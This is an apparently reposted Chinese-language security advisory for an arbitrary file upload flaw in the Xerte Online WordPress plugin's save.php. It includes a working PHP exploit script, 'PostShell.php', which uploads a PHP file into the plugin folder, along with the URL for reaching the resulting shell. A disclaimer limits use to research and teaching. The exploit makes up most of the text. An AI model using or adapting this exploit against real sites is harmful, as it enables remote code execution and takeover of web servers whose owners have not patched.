受影响系统:
描述:
Xerte Online for WordPress是基于服务器的内容作者的工具集。
Xerte Online for WordPress内存在安全 漏洞 ,wp-content/plugins/xerte-online/xertefiles/save.php允许上传带有任意扩展名的文件到webroot内的文件夹,通过提交恶意的 PHP 脚本,可导致任意PHP代码执行。
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Exploit :
PostShell.php
<?php
$code = "<? phpinfo(); ?>";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/xerte-online/xertefiles/save.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('filename'=>"/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php",
'filedata'=>"$code"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://localhost/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php
# Site : 1337day.com Inj3ct0r Exploit Database
建议:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://wordpress.org/extend/plugins/xerte-online/
查看更多关于WordPress Xerte Online插件'save.php'任意文件上的详细内容...